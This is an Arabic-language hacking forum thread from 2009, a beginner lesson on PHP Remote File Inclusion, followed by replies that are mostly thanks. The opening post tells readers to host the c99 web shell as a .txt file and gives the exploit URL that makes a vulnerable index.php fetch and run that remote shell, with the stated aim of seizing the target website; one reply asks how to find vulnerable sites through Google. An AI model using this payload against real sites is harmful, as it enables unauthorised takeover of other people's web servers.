المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : الدرس الثالث (دينامكية عمل Remote File include)



ASDELY-ScOrPiOn
07-21-2009, 10:35 AM
السلام عليكم ورحمة الله وبركاته



وصلنا والحمدلله لدرس الثالث في الدورة وهي ((دينامكية عمل Remote File include))

كما قلت في الدرس الثاني انه هذه الثغرة شبه منقرضه فقررت ان أشرحها كمعلومة عامة للجداد في الهكر

الثغرة اساسها خطأ في دالة include() في لغة الـPHP واللي يعرف للغة بيفهم قصدي

هذه الدالة شغلتها انه تقترن ملف من الملفات مثلا


www.site.com/index.php?id=main.html

هنا المبرمج يطلب من المتغير id الذي يحتويه ملف index.php بأن يقترن محتوى ملف main.html

ففكر بعض الهكر في طريقة لإقتران محتوى الشل الخاص بهم ليستولوا على الموقع

والطريقة هي ان ترفع شل على استضافة مجانية او مدفوعه بشرط ان يكون امتداد الملف txt

مثلا هذا الشل



http://www.c99.mobi/c99.txt
نريد ان نجعل index.php يقترنه عن طريق نفس المتغير id

وطريقة كتابة الإستغلال هي



www.site.com/index.php?id=http://www.c99.mobi/c99.txt?
مع وضع علامة الـ ؟ في نهاية رابط الشل

واذا الثغرة شغاله >>> وانا لأتوقع هذا الشيء

فسوف ترى الشل امامك واذا لم تشتغل الثغرة سترى خطأ او سيحولك الموقع الى صفحة اخرى http://sec-t.com/cc/images/smilies/whistling.gif

الى هن ننهي الشرح http://sec-t.com/cc/images/smilies/smilie76.gif

موج الأحزان
07-22-2009, 03:35 AM
صدقت يالغالي

هالثغرهـ

على ايام الفراعنه

يريد تعلم الهكر
07-23-2009, 09:57 PM
شــــرح وافـــــــــي

واصل من غير فاصل

ABOALLEL
09-20-2009, 10:42 AM
مشكور يا غالي

mahmoud an
11-20-2009, 01:56 AM
مشكور يا غالي

ghou91
12-26-2009, 11:41 PM
how can i find it in google

mecone
02-24-2010, 01:57 AM
شكرا أخي والله هدا الدرس مفيد لاكن إن لم يضهر الشل بمادا تنصحنا كمبتدئين ؟؟؟

sahrawi7
08-09-2010, 09:54 PM
مشكوووووووووووووووووووووو وووووووووووووووووور

sahrawi7
08-09-2010, 10:03 PM
مشكوووووووووووووووووووووو وووووووووووووووووور يا غالي

makaveli
08-10-2010, 01:40 AM
مشكور يا اسد

bachir66
12-05-2010, 01:05 AM
مشكور يا غالي

هكر الديوانيه
03-16-2012, 09:14 PM
مشكور ع الجهد البذول منك يا اخي الكريم